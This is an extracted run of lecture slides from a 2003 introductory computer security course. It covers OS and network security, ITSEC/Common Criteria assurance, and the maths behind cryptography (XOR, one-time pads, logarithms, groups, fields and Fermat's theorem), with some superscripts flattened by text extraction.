![Page 60: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/60.jpg)
Note: CORS
You should be getting your tutorial sessions sorted out usingCORS!
http://www.cors.nus.edu.sg/
CS3235 - Hugh Anderson’s notes. Page number: 59
![Page 61: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/61.jpg)
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
CS3235 - Hugh Anderson’s notes. Page number: 60
![Page 62: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/62.jpg)
Question box
If you have any questions, feel free to place them in thequestion box...
Or stick your hand up...
Or...
CS3235 - Hugh Anderson’s notes. Page number: 61
![Page 63: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/63.jpg)
Last session
Introduction, setting context
Definitions
Cæsar cipher, Enigma, Secure shell
Insecurity
CS3235 - Hugh Anderson’s notes. Page number: 62
![Page 64: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/64.jpg)
This session
• Finish context
• Math preliminaries
– XOR– Logarithms– Fields and groups
CS3235 - Hugh Anderson’s notes. Page number: 63
![Page 65: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/65.jpg)
This session
• Finish context
• Math preliminaries
– XOR– Logarithms– Fields and groups
CS3235 - Hugh Anderson’s notes. Page number: 64
![Page 66: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/66.jpg)
Diagram for BAG
CS3235 - Hugh Anderson’s notes. Page number: 65
![Page 67: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/67.jpg)
Safety/control software
A naive approach to security might involve attempting to en-sure that all programs that run on a computer are safe, andthat all users of computer systems are trustworthy .
Checking even one program is a non-trivial task.
The computer operating system normally provides somelevel of software and hardware security for computer sys-tems, combined with some level of user authorization.
CS3235 - Hugh Anderson’s notes. Page number: 66
![Page 68: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/68.jpg)
Safety/control software
User authorization means passwords!
Systems have grown in complexity over the years.
An article shows the changes in the UNIX mechanism
CS3235 - Hugh Anderson’s notes. Page number: 67
![Page 69: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/69.jpg)
Hardware security
Hardware security in operating systems has been stud-ied in CS2106 (Operating Systems) and other courses.The Kernel/Supervisor bit, processor ring0, memory protec-tion/mapping hardware and so on are all examples of hard-ware security systems intended to co-operate with the OSto enhance system security.
Software security in operating systems takes many forms.The forms range from ad-hoc changes to operating systemsto fix security loopholes as they are found, through to oper-ating systems built from the ground up to be secure.
CS3235 - Hugh Anderson’s notes. Page number: 68
![Page 70: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/70.jpg)
Example: network security
TCP wrappers:
Attacks through poorly controlled TCP or UDP ports. Wrapper provides single point of control Default installation disables all access Re-enable on a case-by-case basis.
CS3235 - Hugh Anderson’s notes. Page number: 69
![Page 71: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/71.jpg)
OS security
NSA have a security-enhanced Linux system:
This version of Linux has a strong, flexible mandatoryaccess control architecture incorporated into the ma-jor subsystems of the kernel. The system providesa mechanism to enforce the separation of informationbased on confidentiality and integrity requirements.
You can read about SELinux at
http://www.nsa.gov/selinux/index.html
CS3235 - Hugh Anderson’s notes. Page number: 70
![Page 72: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/72.jpg)
OS security
Java virtual machine has built-in security model
Microsoft point out that the Linux security model isweak...
Every member of the Windows NT family since Win-dows NT 3.5 has been evaluated at either a C2 levelunder the U.S. Government’s evaluation process or ata C2-equivalent level under the British Government’sITSEC process. In contrast, no Linux products arelisted on the U.S. Government’s evaluated product list.
CS3235 - Hugh Anderson’s notes. Page number: 71
![Page 73: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/73.jpg)
Topic: Assurance
How can we convince ourselves (or our employer) that thecomputer system is to be trusted?
Building assurance is best done by adopting formal meth-ods to confirm, specify and verify the behaviour of systems.
CS3235 - Hugh Anderson’s notes. Page number: 72
![Page 74: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/74.jpg)
ITSEC and CC
UK, Germany, France, Netherlands produced Informa-tion Technology Security Evaluation Criteria (ITSEC).
IT Security Evaluation Manual (ITSEM) specifiesmethodology for evaluation.
Common Criteria for Information Technology SecurityEvaluation is ITSEC, CTCPEC (Canadian Criteria) andUS Federal Criteria
Accepted by the ISO (ISO15408).
CS3235 - Hugh Anderson’s notes. Page number: 73
![Page 75: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/75.jpg)
ITSEC
In an article, elements of the first certification of a smart-card system under the European ITSEC level 6 certificationare outlined.
This process involved verification of the specification with in-dependent systems, and a formal process for the implemen-tation, deriving it from the specification using the refinementprocess.
CS3235 - Hugh Anderson’s notes. Page number: 74
![Page 76: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/76.jpg)
Math preliminaries
This chapter and the following chapter are copied ver-batim from the ”The Laws of Cryptography with JavaCode”, with permission from Prof Neal Wagner. Thebook is well worth reading and contains a lot of infor-mation that is relevant to this course. You can find thebook at
http://www.cs.utsa.edu/˜wagner/lawsbookcolor/laws.pdf
CS3235 - Hugh Anderson’s notes. Page number: 75
![Page 77: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/77.jpg)
Exclusive-Or
Law XOR-1:The cryptographer’s favorite function is Exclusive-Or .
Exclusive-Or comes up constantly in cryptography.
Same as addition mod 2
CS3235 - Hugh Anderson’s notes. Page number: 76
![Page 78: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/78.jpg)
Exclusive-Or
Also as xor or a plus sign in a circle, ⊕.
The expression a⊕ b means either a or b but not both.
Ordinary inclusive-or in mathematics means either oneor the other or both.
The exclusive-or function in C / C++ / Java for bit stringsas a hat character: ^ .
CS3235 - Hugh Anderson’s notes. Page number: 77
![Page 79: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/79.jpg)
Exclusive-Or for 1-bit
Exclusive-Ora b a⊕ b
0 0 00 1 11 0 11 1 0
CS3235 - Hugh Anderson’s notes. Page number: 78
![Page 80: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/80.jpg)
Exclusive-Or
Message A B C
m 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
K(m) = m⊕ k 0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
K(m) R ’ z
CS3235 - Hugh Anderson’s notes. Page number: 79
![Page 81: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/81.jpg)
Exclusive-Or
K(m) R ’ z
0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
m = K(m)⊕ k 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Message A B C
If the bit-stream is random, and not known to an eavesdrop-per, then this is the most secure system. It is known as aone-time-pad.
CS3235 - Hugh Anderson’s notes. Page number: 80
![Page 82: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/82.jpg)
Properties of XOR
a⊕ a = 0a⊕ 0 = aa⊕ 1 =∼ a, where ∼ is bit complement.a⊕ b = b⊕ a (commutativity)a⊕ (b⊕ c) = (a⊕ b)⊕ c (associativity)a⊕ a⊕ a = aif a⊕ b = c, then c⊕ b = a and c⊕ a = b.
CS3235 - Hugh Anderson’s notes. Page number: 81
![Page 83: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/83.jpg)
Reminder
Exchange the values in two variables a and b
temp = a;a = b;b = temp;
CS3235 - Hugh Anderson’s notes. Page number: 82
![Page 84: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/84.jpg)
Exchange using XOR
a = a xor b;b = a xor b;a = a xor b;
a′ = a⊕ b
b′ = (a⊕ b)⊕ b = a
a′′ = (a⊕ b)⊕ a = b
CS3235 - Hugh Anderson’s notes. Page number: 83
![Page 85: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/85.jpg)
Logarithms
Law LOG-1:The cryptographer’s favorite logarithm is log base 2 .
y = logb x is the same as by = x
b(logb x) = x
Logarithm is inverse of exponential.
CS3235 - Hugh Anderson’s notes. Page number: 84
![Page 86: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/86.jpg)
Logarithms
Use logs base 2 in cryptography.
y = log2 x is the same as 2y = x
210 = 1024 is the same as log2 1024 = 10.
2y > 0 for all y, and
log2 x is not defined for x ≤ 0.
CS3235 - Hugh Anderson’s notes. Page number: 85
![Page 87: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/87.jpg)
Properties of logs
log2(ab) = log2 a + log2 b, for all a, b > 0log2(a/b) = log2 a− log2 b, for all a, b > 0log2(1/a) = log2(a−1) = − log2 a, for all a > 0log2(ar) = r log2 a, for all a > 0, rlog2(a + b) = (Oops! No simple formula for this.)
CS3235 - Hugh Anderson’s notes. Page number: 86
![Page 88: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/88.jpg)
Examples
Logarithms base 2
x = 2y = 2log2 x y = log2 x
1, 073, 741, 824 30
1, 048, 576 20
1, 024 10
8 3
4 2
2 1
1 0
CS3235 - Hugh Anderson’s notes. Page number: 87
![Page 89: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/89.jpg)
Examples
Logarithms base 2
x = 2y = 2log2 x y = log2 x
1 0
1/2 −1
1/4 −2
1/8 −3
1/1, 024 −10
0 −∞< 0 undefined
CS3235 - Hugh Anderson’s notes. Page number: 88
![Page 90: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/90.jpg)
Natural logs
A log base 2 is just a fixed constant times a natural log:
log2 x = loge x/ loge 2, (mathematics)
= Math.log(x)/Math.log(2.0); (Java).
The magic constant is:
loge 2 = 0.69314 71805 59945 30941 72321, or 1/ loge 2 = 1.44269 50408 88963 40735 99246.
CS3235 - Hugh Anderson’s notes. Page number: 89
![Page 91: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/91.jpg)
Proof of formula
2y = x, or y = log2 x (then takeloge of each side)
loge(2y) = loge x (then use properties of logarithms)
y loge 2 = loge x (then solve for y)
y = loge x/ loge 2 (then substitutelog2 x for y)
log2 x = loge x/ loge 2.
CS3235 - Hugh Anderson’s notes. Page number: 90
![Page 92: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/92.jpg)
Bits to represent
Law LOG-2:The log base 2 of an integer x tells how many bits it takes
to represent x in binary.
Thus log2 10000 = 13.28771238, so it takes 14 bits to repre-sent 10000 in binary. (In fact, 1000010 = 100111000100002.)Exact powers of 2 are a special case: log2 1024 = 10, but ittakes 11 bits to represent 1024 in binary, as 100000000002.
Similarly, log10(x) gives the number of decimal digitsneeded to represent x.
CS3235 - Hugh Anderson’s notes. Page number: 91
![Page 93: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/93.jpg)
Groups
A group is
a set of group elements with a binary operation f
If one denotes the group operation by #, then the abovesays that for any group elements a and b, a#b is definedand is also a group element.
CS3235 - Hugh Anderson’s notes. Page number: 92
![Page 94: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/94.jpg)
Groups
Groups
are associative, meaning that a#(b#c) = (a#b)#c have an identity element e satisfying a#e = e#a = a
for any group element a. have an inverse a′ any element a satisfying a#a′ =
a′#a = e.
CS3235 - Hugh Anderson’s notes. Page number: 93
![Page 95: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/95.jpg)
Groups
If a#b = b#a for all group elements a and b, the group iscommutative.
Otherwise it is non-commutative. Notice that even in anon-commutative group, a#b = b#a might sometimesbe true — for example if a or b is the identity.
A group with only finitely many elements is called finite;otherwise it is infinite.
CS3235 - Hugh Anderson’s notes. Page number: 94
![Page 96: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/96.jpg)
Examples
• The integers (all whole numbers, including 0 and nega-tive numbers) form a group using addition. The identityis 0 and the inverse of a is −a.
– This is an infinite commutative group.
• The positive rationals (all positive fractions, including allpositive integers) form a group if ordinary multiplicationis the operation. The identity is 1 and the inverse of r is1/r = r−1.
– This is another infinite commutative group.
CS3235 - Hugh Anderson’s notes. Page number: 95
![Page 97: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/97.jpg)
Examples
• The integers mod n form a group for any integer n > 0.This group is often denoted Zn. Here the elements are0, 1, 2, . . ., n − 1 and the operation is addition followedby remainder on division by n. The identity is 0 and theinverse of a is n−a (except for 0 which is its own inverse).
– This is a finite commutative group.
CS3235 - Hugh Anderson’s notes. Page number: 96
![Page 98: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/98.jpg)
Non-commutative Group
Consider 2-by-2 non-singular matrices of real numbers(or rationals), where the operation is matrix multiplication:(
a bc d
). Here a, b, c, and d are real numbers (or ratio-
nals) and ad− bc must be non-zero. Inverse is
1ad− bc
(d −b
−c a
)
and the identity is(
1 00 1
). This is an infinite non-
commutative group.
CS3235 - Hugh Anderson’s notes. Page number: 97
![Page 99: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/99.jpg)
Groups
Law GROUP-1:The cryptographer’s favorite group is the integers mod n ,
Zn.
In the special case of n = 10, the operation of addition inZ10 can be defined by (x + y) mod 10, that is, divide by 10and take the remainder.
CS3235 - Hugh Anderson’s notes. Page number: 98
![Page 100: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/100.jpg)
Integers modulo 10
+ 0 1 2 3 4 5 6 7 8 90 0 1 2 3 4 5 6 7 8 91 1 2 3 4 5 6 7 8 9 02 2 3 4 5 6 7 8 9 0 13 3 4 5 6 7 8 9 0 1 24 4 5 6 7 8 9 0 1 2 35 5 6 7 8 9 0 1 2 3 46 6 7 8 9 0 1 2 3 4 57 7 8 9 0 1 2 3 4 5 68 8 9 0 1 2 3 4 5 6 79 9 0 1 2 3 4 5 6 7 8
CS3235 - Hugh Anderson’s notes. Page number: 99
![Page 101: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/101.jpg)
Fields
A field has two operations
+, with elements of the field forming a commutativegroup. Identity is 0 and inverse of a is −a.
∗, with elements of the field except 0 forming anothercommutative group, identity denoted by 1 and inverseof a denoted by a−1.
CS3235 - Hugh Anderson’s notes. Page number: 100
![Page 102: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/102.jpg)
Fields
There is also the distributive identity, linking + and ∗ :
a ∗ (b + c) = (a ∗ b) + (a ∗ c)
Exclude divisors of zero, that is, non-zero elementswhose product is zero.
Equivalent to the following cancellation property: if c isnot zero and a ∗ c = b ∗ c, then a = b.
CS3235 - Hugh Anderson’s notes. Page number: 101
![Page 103: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/103.jpg)
Examples
The rational numbers (fractions) Q, or the real numbersR, or the complex numbers C, using ordinary additionand multiplication (extended in the last case to the com-plex numbers).
These are all infinite fields.
CS3235 - Hugh Anderson’s notes. Page number: 102
![Page 104: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/104.jpg)
Example: integers mod p
The integers mod p, denoted Zp, where p is a prime num-ber (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, . . . ).
A group using +. Elements without 0 form a group under ∗. The identity is clearly 1, but the inverse of a non-zero element a is not obvious.
CS3235 - Hugh Anderson’s notes. Page number: 103
![Page 105: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/105.jpg)
Integers mod p inverse
In Java, inverse must be x satisfying (x ∗ a)%p == 1.
Find x using the extended Euclidean algorithm:
p is prime and a is non-zero, the greatest commondivisor of p and a is 1.
The extended Euclidean algorithm gives x and y sat-isfying x ∗ a + y ∗ p = 1, or x ∗ a = 1− y ∗ p,
and x is the inverse of a.
CS3235 - Hugh Anderson’s notes. Page number: 104
![Page 106: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/106.jpg)
Field
Law FIELD-1:The cryptographer’s favorite field is the integers mod p ,
denoted Zp , where p is a prime number.
The above field is the only one with p elements. In otherwords, the field is unique up to renaming its elements,meaning that one can always use a different set of sym-bols to represent the elements of the field, but it will still beessentially the same.
CS3235 - Hugh Anderson’s notes. Page number: 105
![Page 107: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/107.jpg)
Another Field
Law FIELD-2:The cryptographer’s other favorite field is GF(2n).
A finite field with pn elements for any integer n > 1, de-noted GF (pn).
Useful in cryptography with p = 2, that is, with 2n ele-ments for n > 1.
The case 28 = 256 is used, for example, in the new U.S.Advanced Encryption Standard (AES).
CS3235 - Hugh Anderson’s notes. Page number: 106
![Page 108: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/108.jpg)
Fermat’s Theorem
Law FERMAT-1:The cryptographer’s favorite theorem is Fermat’s Theorem.
In cryptography, one often wants to raise a number to apower, modulo another number.
For the integers mod p where p is a prime (denoted Zp),there is a result know as Fermat’s Theorem, discoveredby the 17th century French mathematician Pierre de Fer-mat, 1601-1665.
CS3235 - Hugh Anderson’s notes. Page number: 107
![Page 109: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/109.jpg)
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
ap−1 mod p = 1
CS3235 - Hugh Anderson’s notes. Page number: 108
![Page 110: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/110.jpg)
Fermat’s theorem
p a a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12
13 2 2 4 8 3 6 12 11 9 5 10 7 1
13 3 3 9 1 3 9 1 3 9 1 3 9 1
13 4 4 3 12 9 10 1 4 3 12 9 10 1
13 5 5 12 8 1 5 12 8 1 5 12 8 1
13 6 6 10 8 9 2 12 7 3 5 4 11 1
13 7 7 10 5 9 11 12 6 3 8 4 2 1
13 8 8 12 5 1 8 12 5 1 8 12 5 1
13 9 9 3 1 9 3 1 9 3 1 9 3 1
13 10 10 9 12 3 4 1 10 9 12 3 4 1
13 11 11 4 5 3 7 12 2 9 8 10 6 1
13 12 12 1 12 1 12 1 12 1 12 1 12 1
CS3235 - Hugh Anderson’s notes. Page number: 109
